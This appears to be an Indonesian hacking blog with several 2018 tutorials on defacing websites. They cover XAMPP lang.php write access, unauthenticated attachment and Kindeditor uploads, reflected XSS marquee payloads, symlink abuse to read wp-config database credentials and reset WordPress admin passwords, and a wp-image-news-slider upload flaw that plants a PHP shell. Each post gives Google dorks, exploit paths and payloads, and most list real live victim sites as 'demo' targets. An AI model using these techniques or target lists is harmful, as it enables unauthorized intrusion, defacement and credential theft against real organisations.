Tuesday, 3 April 2018

Deface Xampp Local Write Access

Author : Anonimokerl

Hae, Bertemu lagi dengan mimin yang gans. Kali ini mimin akan share Deface poc Xampp Local Write Access. Langsung aja gan.

1. Bahan :

  • Internet
  • Hp/pc

2. Dork :

  1) inurl:/xampp/lang.php
  2) inurl:/security/lang.php
  3) inurl:/xampp/splash.php
  4) inurl:xampp/index.php intitle:XAMPP

kembangin lagi gan.

3. Exploit :
/xampp/lang.php?Hacked_By_Anonimokerl  (untuk path /xammp atau dork no 1,3,4)
 /security/lang.php?Hacked_By_Anonimokerl   (untuk path /security atau dork no 2)
Pada Nicknya bisa kalian ganti saja dengan nick kalian masing masing.

4. Langkah-langkah :
  • Pertama, kita dorking dulu.
  • Kedua, kita pilih salah satu web.
  • Ketiga, masukan exploitnya dibelakang web
Contoh :
https://nimogans.tq/xampp/lang.php?Hacked_By_Anonimokerl

Kalo vuln maka akan ada tulisan seperti ini :


  • Keempat, kita tambahkan exploit dibawah ini dibelakang web tadi.
/xampp/lang.tmp
/security/lang.tmp

Contoh:
https://nimogans.tq/xampp/lang.tmp

Maka akan muncul nick kamu :*


Demo?
http://122.53.86.121/xampp/lang.tmp
http://www.colorin.com.ar/security/index.php
https://help.precisionit.net/xampp/lang.tmp
http://bls.dyndns-office.com/security/lang.tmp
http://www.tb-steiner.at/security/lang.tmp
http://imalys.com/security/lang.tmp
http://revolution-x.net//security/lang.tmp
https://umpwr.ac.id/security/lang.tmp
Masukin aja exploitnya :*

Sekian dulu ea :V
Kalo ada yang kurang ngerti bisa ditanyakan saja :*

Sunday, 1 April 2018

Deface File Attachment Upload Repository

Author : Anonimokerl

Deface Poc File Attachment Upload Repository.
Hae Tamvan, berjumpa lagi dengan mimin. Kali ini mimin akan memberikan tutor Deface poc File Attachment Upload Repository. Langsung saja.

Bahan :
Dork :
- inurl:/admin/modules/bibliography/pop_attach.php
- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- pustaka.*.(isi dengan domain yang lu mau :v)

Exploit : /admin/modules/bibliography/pop_attach.php

Langkah-langkah :

  • Pertama, kita dorking menggunakan salah satu dork diatas.
  • Kedua, pilih salah satu target.
  • Ketiga, masukan exploit diatas dibelang site/

contoh
http://library.stikessarimulia.ac.id/
Ditambah exploit menjadi :
http://library.stikessarimulia.ac.id/admin/modules/bibliography/pop_attach.php
Keempat, kita isi namanya dan upload file.


Lalu klik unggah sekarang.

  • Kelima, kita panggil filenya, lokasi file : site/repository/yourfile.txt

contoh http://library.stikessarimulia.ac.id/repository/nimo.txt

Selesai :V
Sekian dulu, kalo ada yang kurang mengerti bisa ditanyakan.

Deface XSS Vulnerability

Author : Anonimokerl

Hae, bertemu lagi dengan mimin yang tamvan :V kali ini mimin akan share tutor deface poc XSS Vulnerability.Sebelumnya mimin akan menjelaskan apa itu XSS. XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code. XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs.

Okey langsung sadja

Bahan-Bahan :

  • Dork
inurl:"/showcatrows.php?CategoryID=
  • Exploit
"><marquee><h1>Hacked By nick kamu ( Nama team kaamu )</h1></marquee>

Langkah-langkahnya
  • Pertama, Dorking  dulu menggunakan dork diatas.
  • Kedua, Pilih salah satu web.
  • Ketiga, Maksukan  Exploit  diatas dibelang sitenya
contoh  : http://www.paypalshop.org/showcatrows.php?CategoryID=5"><marquee><h1>Hacked By Anonimokerl ( Idiot BlackHat )</h1></marquee>
Kalo berhasil akan muncul seperti ini

Okey Sekian dulu :V
Kalo ada yang tidak dimengerti bisa ditanyakan saja :*

Friday, 30 March 2018

Deface Kindeditor

Author : Anonimokerl

Deface Kindeditor

         Hae beb :* kali ini w pengen post tutor deface poc kindeditor. kindeditor mungkin metode paling gampang dipelajari dan cepet. Walaupun begitu  jangan malu beb :* karena para mastah juga berawal dari poc ini :V bahkan saat mereka masih pemula, mereka soof poc kindeditor di mana-mana :V canda ey :V

okey langsung saja. pertama kita siapkan dulu bahan-bahannya
  1. script deface
  2. internet
  3. pc/hp
  4. Dork 
inurl:examples/uploadbutton.html
    inurl:kindeditor


    langkah-langkahnya
    Pertama kita dorking dulu menggunkan salah satu dork diatas


    Kedua, kita pilih salah satu target
    kalau muncul seperti ini berarti targetnya vuln

    ketiga, klik tombol upload dan pilih script deface kamu di filemanager kamu
    keempat, kita copy exploit yang terdapat dalam kolom

    lalu kita tempel dibelakang site
    contoh :
    http://www.nb-medicalsystem.com/
    lalu tempel dibelakangnya, jadi seperti ini
    http://www.nb-medicalsystem.com//upload/img/file/20180330/20180330123909_60199.html

    Dan taraaa, kalian dah bisa deface :)
    sekian dulu beb
    mppsshhhh 

    Thursday, 8 March 2018

    Tutorial Deface Dengan Symlink

    Post By Mc'Sl0vv

    Hai gan di post ini gua Mc'Sl0vv mau ngasih Tutorial Symlink, buat agan yang belum tau symlink
    symlink gak jauh beda dengan Jumping Server, dengan symlink kita bisa mengakses Path Root di server itu (Maaf kalo salah/kurang jelas, ane gak terlalu mempelajari artinya)

    Ok langsung aja siapin Bahannya:

    • Shell dengan fitur Symlink 
    • Adminer
    • Target/Web yang sudah tertanam Shell

    Ok, Ikutin langkah - langkahnya...

    pilih user/web yang mau agan deface


    Nah... klik Symlink di samping user itu ( karena target ane CMS Wordpress jadi ane klik wp-config.php ), Kalo sudah klik symlink nanti cari file yang ada kata Config, kalo CMS Indo kadang koneksi
    kalau sudah di klik  nanti akan keluar seperti ini


    Perhatikan User, Password dan Nama DataBase... copy password database
    Sekarang ke adminer ( adminer pasti ada di shell yang punya fitur symlink )


    Lihat Gambar diatas... jika sudah diisi yang saya tandai klik login..
    cari tabel user..
    Sekali lagi karena CMS target saya Wordpress jadi tabel usernya adalah wp_user ( wp_ adalah prefix nya.. kadang ada yg beda seperti target saya ini prefixnya beda bukan wp_)


    Nah yang saya tandai itu adalah tabel user target saya.. langsung saja buka..


    Klik pilih data....


    Terlihat disitu ada data" User Atau admin diweb tersebut
    klik situ di salahsatu yang kamu yakin itu admin Utama web tersebut


    Perhatikan gambar diatas dan ikuti... kalau sudah klik save


    jika sudah coba login ke website target dengan password dan username baru yang agan edit lewat adminer tadi... Ane ganti target karena yang sebelumnya kena suspend

    Stelah login agan bebas dah tuh mau ngapain... tinggal upload shell....

    sekian tutornya kalo kurang jelas bisa kontak WhatsApp ane DISINI

    Tuesday, 27 February 2018

    Arbitrary File Upload wp-image-news-slider Vulnerability

    Dork: inurl:wp-content/plugins/wp-image-news-slider
    Upload.php: wp-image-news-slider/js/swfupload/js/upload.php
    Dorking dulu pake dork diatas pilih target, buka upload.php
    Vuln: "No upload found in $_FILES for Filedata"
    CSRF Online: Click Here
    URL: http://site.com/[path]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
    POST File: Filedata
    Upload shell ext: .php.gif
    shell location: /wp-content/uploads/random_name.php.gif
    Live Target/Demo:
    http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
    http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
    http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
    http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php